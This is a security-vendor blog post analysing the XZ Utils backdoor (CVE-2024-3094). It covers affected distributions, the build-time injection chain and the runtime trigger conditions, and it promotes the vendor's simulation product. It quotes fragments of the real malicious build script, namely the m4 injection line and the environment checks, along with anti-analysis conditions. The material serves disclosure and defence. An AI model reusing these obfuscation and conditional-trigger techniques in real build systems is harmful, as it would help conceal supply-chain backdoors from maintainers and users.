CVE-2024-3094: A Backdoor in XZ Utils Leads to Remote Code Execution

The Blue Report 2024

Get a comprehensive analysis of over 136 million cyber attacks and understand the state of threat exposure management.

DOWNLOAD

On March 29, 2024, CISA reported a critical supply chain compromise identified as CVE-2024-3094, affecting the XZ Utils data compression library [1]. This vulnerability, with a CVSS score of 10.0 (Critical), introduces a backdoor that could allow attackers to bypass SSH authentication and execute remote code on the affected systems [2]. CVE-2024-3094 vulnerability affects XZ Utils versions 5.6.0 and 5.6.1 and organizations are advised to downgrade to a secure version, such as 5.4.6, to prevent potential exploits [3].

In this blog, we explained how the XZ Utils CVE-2024-3094 exploits work and how organizations can defend against CVE-2024-3094 attacks.

CVE-2024-3094: Backdoor in XZ Utils Explained

The CVE-2024-3094 vulnerability represents a sophisticated backdoor embedded within versions 5.6.0 and 5.6.1 of the XZ Utils library, affecting the liblzma component. This backdoor, not present in the source code but introduced during the tarball distribution phase, is activated during the library's build process through an obfuscated script. This script, hidden within a test file, extracts and integrates a malicious object file into the library, modifying its behavior. 

Targeting only x86-64 Linux systems during Debian or RPM package builds, the backdoor specifically undermines the integrity of applications reliant on liblzma, most notably impacting OpenSSH when it interacts with systemd, due to libsystemd's dependency on liblzma. The backdoor's execution is conditional, designed to evade detection and analysis, and if triggered, it alters liblzma's function calls, which can potentially lead to SSH authentication bypasses or unauthorized remote code execution, posing a significant security risk to affected systems.

All Affected Products for the CVE-2024-3094 RCE Vulnerability

Here are the systems that are affected by the CVE-2024-3094 RCE vulnerability, with references to their advisories.

OS 

Package 

Versions 

Fix Package Version 

Fedora 40, Rawhide 

xz 

5.6.0, 5.6.1 

Revert to 5.4.x [4]

Arch Linux 

xz 

5.6.0-1, 5.6.1-1 

Upgrade to 5.6.1-2 [5] 

Debian unstable (Sid) 

xz-utils 

5.6.1 

Revert to 5.4.5 [6]

RedHat 

RHEL not affected 

 

RedHat advises its users to stop using Fedora 40 or Fedora Rawhide until they can downgrade their xz version.

Alpine edge 

xz 

5.6.1-r2 

Revert to 5.4.x 

5.6.0-r2 5.6.1-r2 [7]

openSUSE Tumbleweed
openSUSE MicroOS 

xz 

5.6.0 

Revert to 5.4.x [8] 

Proof-of-Concept (PoC) for CVE-2024-3094 Exploit in XZ Utils: How a Backdoor Leads to SSHD Compromise

Here is the full attack lifecycle of the CVE-2024-3094 exploit. 

You can also observe the two-year attack timeline from here ([9]), starting with the creation of the GitHub user Jia Tan (JiaT75) account, which was used to insert a backdoor while pretending to make legitimate contributions to multiple projects.

The attack starts by modifying the build-to-host.m4 script within the build system of the xz utility. This script is responsible for part of the build process that configures the software for the host system.

Within the build-to-host.m4 script, the following line is the vector for code injection. 

gl_[$1]config='sed "r\n" $gl_am_configmake | eval $gl_path_map | $gl[$1]_prefix -d 2>/dev/null'

This line uses a series of piping (|) to apply a sed command and other shell evaluations to manipulate the configuration process.

Essentially, it’s set up to inject an obfuscated script that runs at the end of the configure script. This obfuscation is critical because it helps to hide the malicious intent from a cursory inspection.

As the configure script runs, it executes the previously injected obfuscated code. This code is crafted to detect if it's running in a specific environment:

  • It ensures that the system is a 64-bit Linux environment (x86-64) [10].

if ! (echo "$build" | grep -Eq "^x86_64" > /dev/null 2>&1) && (echo "$build" | grep -Eq "linux-gnu$" > /dev/null 2>&1);then

  • It checks if it is part of a Debian or RPM package build process [10].

if test -f "$srcdir/debian/rules" || test "x$RPM_ARCH" = "xx86_64";then

The obfuscated code within the configure script is set to only install the backdoor under the conditions mentioned above. These checks are designed to make it difficult for researchers to reproduce the problem and, hence, analyze the backdoor, as it will not install in other environments.

If the conditions are met, the code proceeds to modify the Makefile for liblzma. The manipulation specifically targets the symbol resolution process, altering the RSA_public_decrypt@....pl symbol to point to a backdoor payload instead of the legitimate code.

When sshd (the SSH daemon) performs public key authentication, it calls the RSA_public_decrypt function. Due to the manipulation in the Makefile, this call redirects to the attacker’s code.

The malicious code attempts to extract and verify a payload embedded within the public key. After verification, this payload is passed to the system's system() call, which executes arbitrary commands, leading to remote code execution (RCE).

  • Several environmental factors must be in place for the exploit to execute, such as:
    • The TERM environment variable must not be set.
    • The running binary path (argv[0]) must be /usr/sbin/sshd.
    • The LD_DEBUG and LD_PROFILE environment variables must not be set.
    • The LANG environment variable must be set.
    • Debugging tools like rr and gdb must not be detected.

If all runtime requirements are met and the payload is verified, the malicious code executes via system(), leading to RCE. The specific method of RCE, in this case, involves passing commands through the libc's system() function, which is a legitimate function commonly used to execute shell commands from C programs.

How Picus Helps Simulate XZ Utils CVE-2024-3094 Remote Code Execution (RCE) Attacks?

We also strongly suggest simulating the XZ Utils CVE-2024-3094 vulnerability to test the effectiveness of your security controls against sophisticated cyber attacks using the Picus Complete Security Validation Platform. You can also test your defenses against other vulnerability exploitation attacks, such as Citrix Bleed, Follina, and Looney Tunables, within minutes with a 14-day free trial of the Picus Platform.

Picus Threat Library includes the following threats for XZ Utils CVE-2024-3094 vulnerability exploitation attacks:

Threat ID

Threat Name

Attack Module

39104

XZ CVE-2024-3094 Liblzma Vulnerability Download Threat

Network Infiltration

32837

XZ CVE-2024-3094 Liblzma Vulnerability Email Threat

E-mail Infiltration (Phishing)

Picus also provides mitigation suggestions for the XZ Utils CVE-2024-3094 vulnerability exploitation attacks from variety of vendors. 

Picus also provides actionable mitigation content. Picus Mitigation Library includes prevention signatures to address the XZ Utils CVE-2024-3094 vulnerability in preventive security controls. Currently, Picus Labs validated the following signatures for the XZ Utils CVE-2024-3094 vulnerability: 

Security Control

Signature Name

Signature ID

F5 BIG-IP

ELF/CVE_2024_3094.A!exploit

10176362

F5 BIG-IP

PossibleThreat

62183

ForcePoint

File_Malware-Blocked

 

PaloAlto IPS

exploit/Linux.xzbackdoor.c

634305801

PaloAlto IPS

trojan/Linux.xzbackdoor.a

634262265

PaloAlto IPS

trojan/Linux.xzbackdoor.b

634305813

PaloAlto IPS

trojan/Linux.xzbackdoor.e

634305822

PaloAlto IPS

trojan/Linux.xzbackdoor.f

634305870

PaloAlto IPS

trojan/Linux.xzbackdoor.d

634305783

CheckPoint NGFW

XZ Utils Backdoor (CVE-2024-3094)

asm_dynamic_prop_XZ_UTILS_RCE

Start simulating emerging threats today and get actionable mitigation insights with a  14-day free trialof the Picus Complete Security Validation Platform.

References

[1] “Reported Supply Chain Compromise Affecting XZ Utils Data Compression Library, CVE-2024-3094,” Cybersecurity and Infrastructure Security Agency CISA. Available: https://www.cisa.gov/news-events/alerts/2024/03/29/reported-supply-chain-compromise-affecting-xz-utils-data-compression-library-cve-2024-3094. [Accessed: Mar. 31, 2024]

[2] “oss-security - backdoor in upstream xz/liblzma leading to ssh server compromise.” Available: https://www.openwall.com/lists/oss-security/2024/03/29/4. [Accessed: Mar. 31, 2024]

[3] “tukaani-project/xz,” GitHub. Available: https://github.com/tukaani-project/xz. [Accessed: Mar. 31, 2024]

[4] “Urgent security alert for Fedora Linux 40 and Fedora Rawhide users,” Mar. 29, 2024. Available: https://www.redhat.com/en/blog/urgent-security-alert-fedora-41-and-rawhide-users. [Accessed: Mar. 31, 2024]

[5] “Arch Linux,” Mar. 29, 2024. Available: https://archlinux.org/news/the-xz-package-has-been-backdoored/. [Accessed: Mar. 31, 2024]

[6] “[SECURITY] [DSA 5649-1] xz-utils security update.” Available: https://lists.debian.org/debian-security-announce/2024/msg00057.html. [Accessed: Mar. 31, 2024]

[7] “Alpine Linux packages.” Available: https://pkgs.alpinelinux.org/package/edge/main/x86/xz. [Accessed: Mar. 31, 2024]

[8] “openSUSE addresses supply chain attack against xz compression library,” openSUSE News. Available: https://news.opensuse.org/2024/03/29/xz-backdoor/. [Accessed: Mar. 31, 2024]

[9] Shachar Menashe, Senior Director Security Research and Jonathan Sar Shalom, Director of Threat Research, “XZ Backdoor Attack CVE-2024-3094: All You Need To Know,” JFrog, Mar. 31, 2024. Available: https://jfrog.com/blog/xz-backdoor-attack-cve-2024-3094-all-you-need-to-know/. [Accessed: Mar. 31, 2024]

[10] “oss-security - backdoor in upstream xz/liblzma leading to ssh server compromise.” Available: https://www.openwall.com/lists/oss-security/2024/03/29/4. [Accessed: Mar. 31, 2024]